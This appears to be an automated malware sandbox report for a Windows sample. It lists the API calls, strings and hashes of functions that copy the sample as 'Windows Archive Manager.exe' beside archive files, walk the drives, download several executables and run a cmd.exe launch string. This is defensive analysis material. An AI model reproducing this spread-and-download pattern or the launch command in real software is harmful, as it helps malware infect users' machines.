Part of subcall function 004032A4: Sleep.KERNEL32(000003E8), ref: 004034F0
Part of subcall function 004032A4: PathFindFileNameW.SHLWAPI(?), ref: 0040353F
Part of subcall function 004032A4: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00403575
Part of subcall function 004032A4: DeleteFileW.KERNEL32(00000000), ref: 00403581
Part of subcall function 004032A4: Sleep.KERNEL32(000001F4), ref: 0040358C
Part of subcall function 004032A4: CopyFileW.KERNEL32(00408260,?,00000000), ref: 004035A0
Part of subcall function 004032A4: Sleep.KERNEL32(00000064), ref: 004035A8

GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00403361
CharLowerW.USER32(?), ref: 004033FB
Sleep.KERNEL32(000003E8), ref: 00403430
Sleep.KERNEL32(000003E8), ref: 00403470
Sleep.KERNEL32(000003E8), ref: 004034B0
Sleep.KERNEL32(00000064), ref: 004035B5
FindNextFileW.KERNEL32(000000FF,?), ref: 004035C8
FindClose.KERNEL32(000000FF), ref: 004035DC

Strings

.7z, xrefs: 00403476
Recycle.Bin, xrefs: 0040336F
.zip, xrefs: 00403401
.rar, xrefs: 00403436
Windows Archive Manager.exe, xrefs: 00403492
*.*, xrefs: 004032E4
Windows Archive Manager.exe, xrefs: 004034D2
Windows Archive Manager.exe, xrefs: 00403452
.tar, xrefs: 004034B6
.exe, xrefs: 00403554

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Sleep$File$Find$CurrentDirectoryNamePathmemset$AttributesCharCloseCopyDeleteFirstFullLowerNext
String ID: *.*$.7z$.exe$.rar$.tar$.zip$Recycle.Bin$Windows Archive Manager.exe$Windows Archive Manager.exe$Windows Archive Manager.exe
API String ID: 3651916915-102573928
Opcode ID: 8b1b2d7f8a039c62f6c4c4d9b4637672017d804c880b88671d2c665f31323fe8
Instruction ID: 13ad03c69c0ac6c2c187dcc74027e427e02459b5877deabd40d7f6eaf18e51b9
Opcode Fuzzy Hash: 8b1b2d7f8a039c62f6c4c4d9b4637672017d804c880b88671d2c665f31323fe8
Instruction Fuzzy Hash: 6D817F71904618AFEB209F60DD49B9E77B9EB44305F5001FAF109F61D0EF7A9A948F18

Function 00410C90 Relevance: 25.6, APIs: 17, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00410CAC
RtlEnterCriticalSection.NTDLL(0044B340), ref: 00410CBA
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00410CD3

Part of subcall function 00423370: RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
Part of subcall function 00423370: LoadCursorA.USER32(00000000,00007F00), ref: 00423402
Part of subcall function 00423370: RegisterClassExA.USER32(00000030), ref: 00423425
Part of subcall function 00423370: __recalloc.LIBCMT ref: 00423479
Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9

FindResourceA.KERNEL32(0044B30C,00000081,00000005), ref: 00410CEC
FindResourceA.KERNEL32(0044B30C,00000081,000000F0), ref: 00410D07
LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D13
LockResource.KERNEL32(00000000), ref: 00410D1A
LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D28
LockResource.KERNEL32(00000000), ref: 00410D37
DialogBoxIndirectParamA.USER32(0044B30C,00000000,?,00411A10,00000000), ref: 00410D5C
GetLastError.KERNEL32 ref: 00410D71
GlobalHandle.KERNEL32(00000000), ref: 00410D7E
GlobalFree.KERNEL32(00000000), ref: 00410D85
SetLastError.KERNEL32(00000000), ref: 00410DA3
GetLastError.KERNEL32 ref: 00410DAB
GetLastError.KERNEL32 ref: 00410DBA
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00410DD4

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Resource$ErrorLast$ClassCriticalLoadRegisterSection$ClipboardEnterFindFormatGlobalInfoLock$CurrentCursorDialogExceptionFreeHandleIndirectLeaveParamRaiseThread__recalloc
String ID:
API String ID: 825656904-0
Opcode ID: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
Instruction ID: f745feaec7197e157a37296f2868a76793427c604a9b77b08ca0e5f371f76add
Opcode Fuzzy Hash: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
Instruction Fuzzy Hash: A631D835241700BBD7201BB5BC8CAAB3B58EB49721B141A76FD11C2391DBF8DCC1866D

Function 00402C41 Relevance: 24.1, APIs: 16, Instructions: 119sleepCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00402C56
GetModuleFileNameW.KERNEL32(00000000,00408058,00000208), ref: 00402C6A
Sleep.KERNEL32(000001F4), ref: 00402C75
_wfopen.MSVCRT ref: 00402C85
fseek.MSVCRT ref: 00402CA5
ftell.MSVCRT ref: 00402CB3
fclose.MSVCRT ref: 00402CC4
Sleep.KERNEL32(000001F4), ref: 00402CCF
memset.MSVCRT ref: 00402CE3
memset.MSVCRT ref: 00402CF9
GetLogicalDriveStringsW.KERNEL32(000000D0,?), ref: 00402D0D
GetDriveTypeW.KERNEL32(?), ref: 00402D2D
SetErrorMode.KERNEL32(00000001), ref: 00402D56
GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,00000000,00000000,00000000), ref: 00402D75
GetDriveTypeW.KERNEL32(?), ref: 00402DAA
Sleep.KERNEL32(000003E8), ref: 00402DE8

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: DriveSleepmemset$Type$ErrorFileInformationLogicalModeModuleNameStringsVolume_wfopenfclosefseekftell
String ID:
API String ID: 2588250049-0
Opcode ID: d191e9a8f75e0fbffc6d4aae871cf30d55971b18d680d993de1adc8e6532ab47
Instruction ID: abd61d0839dc9ad5a3035ce58b77fb3bf3c2ac84987508875e7d16b0c097f562
Opcode Fuzzy Hash: d191e9a8f75e0fbffc6d4aae871cf30d55971b18d680d993de1adc8e6532ab47
Instruction Fuzzy Hash: D3418671980248BBEB10AB90EE4EF9E77B4AF04701F6000B6F504F51E1DAB85E94DB59

Function 00426E9B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0042EDA1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EDB6
UnhandledExceptionFilter.KERNEL32(00440498), ref: 0042EDC1
GetCurrentProcess.KERNEL32(C0000409), ref: 0042EDDD
TerminateProcess.KERNEL32(00000000), ref: 0042EDE4

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
Instruction ID: 23f69739ab82ab60ae37d22de6363e677c78d496a800df86a2d8b411d35bdd9f
Opcode Fuzzy Hash: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
Instruction Fuzzy Hash: AA21E0BC9042449FE711DF69FC496497BA0FB4A310F80107AE50997BA5E7B4A984CF8D

Function 004020F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00402100
CoCreateInstance.OLE32(004051CC,00000000,00000001,004051BC,?), ref: 0040212F

Strings

/c start _ & _\DeviceManager.exe & exit, xrefs: 004021AA
%windir%\system32\cmd.exe, xrefs: 00402142

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CreateInitializeInstance
String ID: %windir%\system32\cmd.exe$/c start _ & _\DeviceManager.exe & exit
API String ID: 3519745914-2217386832
Opcode ID: 132f5f5c97dbb597229882e81c4ab9378bc9746ca38293107714f6a099fd9e5a
Instruction ID: 57fe1dbd42bb2324eb575007eabe7048b87a754a97f5de83621bb56dba04deff
Opcode Fuzzy Hash: 132f5f5c97dbb597229882e81c4ab9378bc9746ca38293107714f6a099fd9e5a
Instruction Fuzzy Hash: 1C414C74A00209EFDB01DF98D989E9DBBB1FF49305F1081A5F921AB2A1C775AA50EF44

Function 004360A0 Relevance: 3.9, Strings: 3, Instructions: 147COMMON

Download Yara Rule

Strings

ineI, xrefs: 00436107
ntel, xrefs: 00436110
Genu, xrefs: 004360FE

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID:
String ID: Genu$ineI$ntel
API String ID: 0-3389352399
Opcode ID: 52cbd61522585250e19d3114367751f5325cb0de59fbfbbc320b6f6ec86cf59e
Instruction ID: bfbf53ffdf3c68aa112622bc787a3d38529acc3aeedecc54d8b01405816e6063
Opcode Fuzzy Hash: 52cbd61522585250e19d3114367751f5325cb0de59fbfbbc320b6f6ec86cf59e
Instruction Fuzzy Hash: 78417F71E043066BFF548A99C8853AFBAA1EB4C310F26D06ADA05E6386D67C8D40CB58

Function 00423CAD Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00422511,?,00423D9B,00422511,?,00422511,?), ref: 00423CC1
HeapFree.KERNEL32(00000000,?,00423D9B,00422511,?,00422511,?), ref: 00423CC8

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 836220c8a2a7f04cd6de906eb50738faec21f6589d8772b7677baa12a7aca838
Instruction ID: 33085a4ccc8ec1950882e2bb6640ee68c40b8ea8a8b0bd8591927fa50b4ae241
Opcode Fuzzy Hash: 836220c8a2a7f04cd6de906eb50738faec21f6589d8772b7677baa12a7aca838
Instruction Fuzzy Hash: E2D0C932544218ABDF101FEABD0CA9A3B6DF789B22F404461F51DD2560CB76E850EA98

Function 00436DB0 Relevance: 1.6, Strings: 1, Instructions: 339COMMON

Download Yara Rule

Strings

GenuineIntel, xrefs: 00436DEE

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID:
String ID: GenuineIntel
API String ID: 0-2798635751
Opcode ID: 1279d484bb9a458165338d8abd8b6d1b876928afe97c09f6af912ebc83d36ba1
Instruction ID: d2096b51ca2794451b2d7f5899c45eecea93f550925a2222af7c97c906a12598
Opcode Fuzzy Hash: 1279d484bb9a458165338d8abd8b6d1b876928afe97c09f6af912ebc83d36ba1
Instruction Fuzzy Hash: 79D159B5D052299FDB28CF4AD9812AEBBF1FB89310F24856ED949E3310D334A941CF58

Function 02511560 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_LisectAVT_2403002B_290.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 02513134 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 00401294 Relevance: 65.0, APIs: 26, Strings: 11, Instructions: 220fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00408260,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401371
GetFileSize.KERNEL32(000000FF,00000000), ref: 00401395
CloseHandle.KERNEL32(000000FF), ref: 004013B0

Strings

r, xrefs: 004012AD
4@, xrefs: 0040150D
s, xrefs: 004012DE
=, xrefs: 00401332
@, xrefs: 00401347
t, xrefs: 004014D3
0, xrefs: 004014FF
R, xrefs: 0040129F
{, xrefs: 00401339
a, xrefs: 004012A6
!, xrefs: 004012B4

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID: !$0$=$@$R$a$r$s$t${$4@
API String ID: 1378416451-1478285898
Opcode ID: 1dbbe0be060ca4b6c279e6e33d22273a4b7798d521a9a355bc9f0e26829d7780
Instruction ID: 3aa843619d31d418073711cef59783edf8e6a9b44ca045ba224e396693470445
Opcode Fuzzy Hash: 1dbbe0be060ca4b6c279e6e33d22273a4b7798d521a9a355bc9f0e26829d7780
Instruction Fuzzy Hash: 02B12A31904268EEEF219B64DD09B9EBBB5BF04304F0441E6E24CBA1E1DB751E84DF69

Function 0041411E Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 454memorystringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000FC), ref: 00414176
SetWindowLongA.USER32(?,000000FC,?), ref: 00414184
IsWindow.USER32(?), ref: 004141B7
GetCurrentProcess.KERNEL32 ref: 00414206
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00414214
SetWindowLongA.USER32(?,000000FC,?), ref: 00414220
GetParent.USER32(?), ref: 00414263
GetClassNameA.USER32(00000000,?,00000008), ref: 00414271
lstrcmp.KERNEL32(?,0043ACB4), ref: 00414281
GetSysColor.USER32(0000000F), ref: 0041428D
GetSysColor.USER32(00000005), ref: 00414297
GetWindowLongA.USER32(?,000000F0), ref: 004143A9
GetWindowLongA.USER32(?,000000F0), ref: 004143C4
SetWindowLongA.USER32(?,000000F0,00000000), ref: 004143D5
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004143E7
VariantInit.OLEAUT32(?), ref: 0041444B
VariantClear.OLEAUT32(?), ref: 0041445D
SysAllocString.OLEAUT32(?), ref: 00414471
VariantClear.OLEAUT32(?), ref: 004144B1
VariantClear.OLEAUT32(?), ref: 004144BC
lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
GlobalFix.KERNEL32(00000000), ref: 004145D1
_memcpy_s.LIBCMT ref: 004145E2
GetWindowLongA.USER32(?,000000FC), ref: 004146A8
SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6

Strings

4D, xrefs: 004142AA

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Window$Long$Variant$Clear$AllocColorGlobal$CacheClassCurrentFlushInitInstructionNameParentProcessString_memcpy_slstrcmplstrlen
String ID: 4D
API String ID: 1879328196-4064760932
Opcode ID: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
Instruction ID: d33cbc65b261bd5f71919fcd58597f20de14d50e8eab0a0e342eb175f4602f49
Opcode Fuzzy Hash: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
Instruction Fuzzy Hash: 99028C71204205AFDB10CF24D848BABBBE5BF85714F14862AF859DB2A0D778DD81CB5A

Function 00401674 Relevance: 42.4, APIs: 12, Strings: 12, Instructions: 428networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000001,00000000,00000000,00000000), ref: 0040168A
InternetOpenUrlA.WININET(?,vG@,00000000,00000000,00000000,00000000), ref: 004016AB
PathFindFileNameA.SHLWAPI(?), ref: 004016C1
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 00401748
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 004017C2
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040183C
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 004018B6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040193F
InternetCloseHandle.WININET(00000000), ref: 00401948
InternetCloseHandle.WININET(?), ref: 00401951
InternetCloseHandle.WININET(00000000), ref: 00401CC7
InternetCloseHandle.WININET(00000000), ref: 00401CD0

Strings

s.exe, xrefs: 00401B67
m.exe, xrefs: 0040174E
vG@, xrefs: 004016A5
o.exe, xrefs: 004018BC
t.exe, xrefs: 004016D4
t.exe, xrefs: 00401957
p.exe, xrefs: 00401AB7
o.exe, xrefs: 00401C17
m.exe, xrefs: 00401A07
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0, xrefs: 00401685
p.exe, xrefs: 004017C8
s.exe, xrefs: 00401842

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Internet$HttpInfoQuery$CloseHandle$Open$FileFindNamePath
String ID: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0$m.exe$m.exe$o.exe$o.exe$p.exe$p.exe$s.exe$s.exe$t.exe$t.exe$vG@
API String ID: 37956365-2170266109
Opcode ID: d811898af9405caae475fb2c357d6a7e46e2496191ffd16bc4c9c98ebedf9716
Instruction ID: fb553488e42a15cb40c77f0b723d3c996e8af59fc795cfdcf88d4fc03e82c5ec
Opcode Fuzzy Hash: d811898af9405caae475fb2c357d6a7e46e2496191ffd16bc4c9c98ebedf9716
Instruction Fuzzy Hash: F3224974D042989FDF21CFA8C844BEDBBB1AB16314F1441EAD099B72A1D3785E89CF19

Function 00420FC0 Relevance: 31.7, APIs: 21, Instructions: 206COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 00420FE0
GetClipBox.GDI32(00000000,?), ref: 00421001
LPtoDP.GDI32(?,?,00000002), ref: 0042101C
SelectObject.GDI32(?,00000000), ref: 00421047
DPtoLP.GDI32(?,?,00000002), ref: 00421058
SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042106C
SetBkMode.GDI32(00000001,00000001), ref: 00421078
SelectObject.GDI32(?,?), ref: 0042108A
GetClientRect.USER32(?,?), ref: 004210AA
SetBkColor.GDI32(?,?), ref: 004210BA
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004210D9
SetBkColor.GDI32(?,?), ref: 004210E8

Part of subcall function 004212B0: GetClipBox.GDI32(?,?), ref: 004212DA
Part of subcall function 004212B0: SetBkColor.GDI32(?,00000001), ref: 0042132A
Part of subcall function 004212B0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
Part of subcall function 004212B0: SetBkColor.GDI32(?,00000000), ref: 00421367
Part of subcall function 004212B0: DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
Part of subcall function 004212B0: OffsetRect.USER32(00000010,00000003,?), ref: 004213CD

GetScrollPos.USER32(?,00000001), ref: 0042111F
OffsetRect.USER32(?,00000000,00000000), ref: 00421132
OffsetRect.USER32(?,00000000,?), ref: 004211D9
SelectObject.GDI32(?,00000000), ref: 004211F6
SetBkMode.GDI32(?,00000000), ref: 00421201
SelectObject.GDI32(?,?), ref: 0042124D
DeleteObject.GDI32(?), ref: 0042125C
DeleteDC.GDI32(?), ref: 0042127F
EndPaint.USER32(?,?), ref: 0042128E

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Object$ColorRectSelect$Offset$ClipDeleteModePaintText$BeginClientDrawEdgeScrollWindow
String ID:
API String ID: 2062583074-0
Opcode ID: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
Instruction ID: 7b82af6886746e71b5745f1b2fbacf292f59da6906099b940e92044999803834
Opcode Fuzzy Hash: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
Instruction Fuzzy Hash: 5991C271508340EFDB218F65DD48BABBBF6FB88740F10892DFA9982260CB719854DF56

Function 004035E4 Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 90filethreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004035FB
memset.MSVCRT ref: 00403611
memset.MSVCRT ref: 00403627
memset.MSVCRT ref: 0040363B
GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00403651
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00403668
GetLogicalDriveStringsW.KERNEL32(000000D0,?), ref: 0040367A
GetTickCount.KERNEL32 ref: 00403680
srand.MSVCRT ref: 00403687
_snwprintf.MSVCRT ref: 004036A3
CopyFileW.KERNEL32(?,00408260,00000000), ref: 004036B9
SetFileAttributesW.KERNEL32(00408260,00000080), ref: 004036CD
GetDriveTypeW.KERNEL32(?), ref: 004036F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00403711
ExitThread.KERNEL32 ref: 00403734

Strings

%ls\Windows Archive Manager.exe, xrefs: 00403694
%temp%, xrefs: 00403663

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: memset$File$DriveStrings$AttributesCopyCountCurrentDirectoryEnvironmentExitExpandLogicalModuleNameThreadTickType_snwprintfsrand
String ID: %ls\Windows Archive Manager.exe$%temp%
API String ID: 1005768253-3630328173
Opcode ID: 40a7cf7f1805e51efa996ffe9d7b8850cb8bf2961425a96cb5c0fae36d6510fc
Instruction ID: d69677a716828d0fd0f9714df326e3bc7eebc1e83e94ac9ad288232d9b6456d4
Opcode Fuzzy Hash: 40a7cf7f1805e51efa996ffe9d7b8850cb8bf2961425a96cb5c0fae36d6510fc
Instruction Fuzzy Hash: F1318AF1A407086BDB609B60DC4AF9F376CEB00701F1044B6F648F61D2DA789A848F68

Function 00423370 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 172registryclipboardCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
LoadCursorA.USER32(00000000,00007F00), ref: 00423402
RegisterClassExA.USER32(00000030), ref: 00423425
__recalloc.LIBCMT ref: 00423479
GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
LoadCursorA.USER32(00000000,00007F00), ref: 0042351E
RegisterClassExA.USER32(00000030), ref: 00423541
__recalloc.LIBCMT ref: 00423587
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 004235C9

Strings

0, xrefs: 004234F0

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ClassRegister$ClipboardCriticalCursorFormatInfoLoadSection__recalloc$EnterLeave
String ID: 0
API String ID: 664480883-4108050209
Opcode ID: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
Instruction ID: 40b37d6fc815d34b22f1382bcbd39b080c0c3bcab1dcc9cb4347d5ed29d7557a
Opcode Fuzzy Hash: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
Instruction Fuzzy Hash: 7D61AFB0A043419BD711CF16E884A1ABBF5FF95715F90452EE89483360E7B8CA85CB8E

Function 0041FE80 Relevance: 22.8, APIs: 15, Instructions: 268COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 0041FF6D
SelectObject.GDI32(?,?), ref: 0041FFB8
DeleteDC.GDI32(00000000), ref: 0041FFD4
InterlockedDecrement.KERNEL32(?), ref: 0041FFFA
InterlockedDecrement.KERNEL32(?), ref: 0042002D
SelectObject.GDI32(?,?), ref: 00420065
SetRectEmpty.USER32(?), ref: 00420084
DrawTextA.USER32(?,?,000000FF,?,00000424), ref: 004200B0
SelectObject.GDI32(?,00000000), ref: 004200BB
InterlockedDecrement.KERNEL32(?), ref: 004200EC
SelectObject.GDI32(?,?), ref: 00420124
SetRectEmpty.USER32(?), ref: 00420143
DrawTextA.USER32(?,?,000000FF,?,00000610), ref: 0042016F
SelectObject.GDI32(?,00000000), ref: 0042017A
InterlockedDecrement.KERNEL32(?), ref: 004201AB

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ObjectSelect$DecrementInterlocked$DrawEmptyRectText$Delete
String ID:
API String ID: 1261204413-0
Opcode ID: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
Instruction ID: 0d3b065532d34c83c141dc093bc01bf73ec72bfda3dbf1df21a0141086e03954
